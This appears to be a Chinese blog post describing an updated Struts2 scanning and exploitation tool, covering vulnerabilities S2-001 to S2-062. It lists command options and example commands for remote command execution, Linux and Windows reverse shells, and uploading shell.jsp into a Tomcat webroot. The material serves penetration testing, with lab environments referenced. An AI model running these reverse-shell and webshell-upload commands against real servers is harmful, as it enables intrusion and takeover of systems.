struts2综合漏洞扫描工具
python扫描工具更新2022-4-16
1.添加了S2-062漏洞利用
其实是对S2-061漏洞的绕过
支持命令执行,Linux反弹shell,windows反弹shell。
2.解决了了Windows反弹shell的功能
底层原理:解决了有效负载Runtime.getRuntime().exec()执行复杂windows命令
不成功的问题。
详情文章:https://www.yuque.com/docs/share/0abe4b7e-45fd-4902-a23a-ad51ab72cbb9?# 《使用java命令执行函数反弹windows-shell》
工具地址https://github.com/Vancomycin-g/Struts2Scan/
里面有两个工具,一个是python编写的工具,另一个是jar文件
python工具是改变大佬的。jar文件是在网络上找的。
java工具
优点
1.扫描比较稳定
2.误报情况少,
3.可视化,方便操作
缺点
1.无法指定payload进行利用
2.无法反弹shell
3.无S2-061 payload
用法
直接一键扫描就行了,简单粗暴
python工具
优点
1.大多payload支持Linux反弹shell,少部分payload支持windows反弹shell
2.可以自己选可以使用的payload.
3.有S2-061 payload
缺点
1.稳定性优化的还可以,可能存在误报情况,
2.有许多命令参数。
工具介绍
原作者:github地址:https://github.com/HatBoy/Struts2-Scan
感谢原作者开源的工具
此次是在原有的基础上进行升级,优化。
升级内容:
1.添加了S2-061漏洞
2.优化了误报情况。
3.个别添加了windows反弹shell功能。
4.原来参数-r ip:port修改成了,
-lr ip:port 反弹Linuxshell
-wr ip:port反弹Windows shell
5.还有其他细微的地方
Struts2-Scan
- Struts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,S2-061,S2-062
- 支持单个URL漏洞检测和批量URL检测,指定漏洞利用,可获取WEB路径,执行命令,反弹shell和上传文件,注意,并不是所有的漏洞均支持上述功能,只有部分功能支持
运行环境
- Python3.6.X及其以上版本
- 第三方库: click, requests, bs4
- 测试环境: Ubuntu 16.04
- 漏洞环境已上传,参考地址:
- https://github.com/Medicean/VulApps/tree/master/s/struts2/
- https://github.com/vulhub/vulhub/tree/master/struts2
工具参数说明
Usage: Struts2Scan.py [OPTIONS]Struts2批量扫描利用工具Options:-i, --info 漏洞信息介绍-v, --version 显示工具版本-u, --url TEXT URL地址-n, --name TEXT 指定漏洞名称, 漏洞名称详见info-f, --file TEXT 批量扫描URL文件, 一行一个URL-d, --data TEXT POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}-c, --encode TEXT 页面编码, 默认UTF-8编码-p, --proxy TEXT HTTP代理. 格式为http://ip:port-t, --timeout TEXT HTTP超时时间, 默认10s-w, --workers TEXT 批量扫描进程数, 默认为10个进程--header TEXT HTTP请求头, 格式为: key1=value1&key2=value2-e, --exec 进入命令执行shell--webpath 获取WEB路径-lr, --Linux_reverse TEXT 反弹Linux shell地址, 格式为ip:port-wr, --Win_reverse TEXT 反弹Windows shell地址, 格式为ip:port--upfile TEXT 需要上传的文件路径和名称--uppath TEXT 上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp-q, --quiet 关闭打印不存在漏洞的输出,只保留存在漏洞的输出-h, --help Show this message and exit.
使用例子
查看漏洞详细信息:
$ python3 Struts2Scan.py --info
单个URL漏洞检测:
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action
批量漏洞检测:
$ python3 Struts2Scan.py -f urls.txt
指定POST数据:
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -d name=admin&email=admin&age={exp}
常用方法
# 命令执行
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -e# 反弹Linux shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -lr 192.168.100.8:8888# 反弹Windows shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 -wr 192.168.100.8:8888# 上传shell
$ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp
struts2综合漏洞扫描工具相关推荐
- 漏洞扫描工具_Vulmap漏洞扫描工具
本文来源于https://github.com/zhzyker/vulmap 已与作者联系 作者同意发送本文章 Vulmap目前支持以下漏洞 +-------------------+-------- ...
- Netsparker超轻量级Web安全漏洞扫描工具使用教程介绍
有特征 此工具分为收费版本和绿色版本 绿色版本也是很强大的 一 .Netsparker工具简介 Netsparker是一款综合型的web应用安全漏洞扫描工具,它分为专业版和免费版,免费版的功能也比较强 ...
- 漏洞扫描工具Vulmap
Vulmap是一款漏洞扫描工具, 可对Web容器.Web服务器.Web中间件以及CMS等Web程序进行漏洞扫描, 并且具备漏洞利用功能.相关测试人员可以使用vulmap检测目标是否存在特定漏洞, 并且 ...
- 常见漏洞扫描工具AWVS、AppScan、Nessus的使用
HVV笔记--常见漏洞扫描工具AWVS.AppScan.Nessus的使用 1 AWVS 1.1 安装部署 1.2 激活 1.3 登录 1.4 扫描web应用程序 1.4.1 需要账户密码登录的扫描 ...
- java web 漏洞扫描工具_java编写web漏洞扫描系列 一、GET/POST
今天是java编写漏洞扫描工具系列一,在整个系列中我将以案例驱动方式进行,从基本的请求,到常规漏洞扫描,Burp插件,调用SQLmap api,整合burp+sqlmap(Web平台),漏洞扫描平台( ...
- 渗透测试常用WEB安全漏洞扫描工具集合
渗透测试阶段信息收集完成后,需根据所收集的信息,扫描目标站点可能存在的漏洞,包括SQL注入漏洞.跨站脚本漏洞.文件上传漏洞.文件包含漏洞及命令执行漏洞等,然后通过这些已知的漏洞,寻找目标站点存在攻击的 ...
- vulmap——漏洞扫描工具简介与使用教程
一.工具简介 vulmap是一款漏洞扫描工具, 可对Web容器.Web服务器.Web中间件以及CMS等Web程序进行漏洞扫描, 并且具备漏洞利用功能. 相关测试人员可以使用vulmap检测目标是否存在 ...
- 网站漏洞扫描工具Uniscan
网站漏洞扫描工具Uniscan 网站漏洞的种类有很多种,如何快速扫描寻找漏洞,是渗透测试人员面临的一个棘手问题.Uniscan是Kali Linux预先安装的一个网站漏洞扫描工具.该工具可以针对单一. ...
- WordPress漏洞扫描工具WPScan
WordPress漏洞扫描工具WPScan WordPress是主流的PHP网站模版,以构建博客而闻名.WordPress可以通过安装插件和主题的方式扩展功能,这也带来的安全隐患.WordPress是 ...
最新文章
- 斐波那契数列的实现(简单递归和动态规划)
- MFC类中获得其它类指针
- 微型计算机的层次结构,计算机系统层次结构微程序级
- Linux网络流量实时监控工具-ifstat
- Visual Entity 手册(十一)代码生成设置
- DVWA通关教程(中)
- avalon框架,简单的MVVM
- android jni 中jnienv,android JNI中JNIEnv類型和jobject類型的解釋
- ORA-14551: 无法在查询中执行 DML 操作
- 智能化连锁门店解决方案
- 数据结构上机实践第11周项目1 - 图基本算法库
- linux 网络编程 ------------TCP多进程并发服务器
- Android Multimedia框架总结(二十三)MediaCodec补充及MediaMuxer引入(附案例)
- dnf手游体验服显示无法连接服务器,《DNF手游》体验服服务器人数上限怎么办 体验服服务器人数上限解决办法...
- android信鸽推送demo_android app 集成 信鸽推送
- 《SolidWorks 2014中文版完全自学手册》——导读
- golang调用sdl2,键盘和鼠标事件
- 实战案例分享:我用 Python 预测房价走势
- 51单片机入门学习篇-led灯、按键、数码管、中断
- TensorFlow2 -官方教程 :保存和恢复模型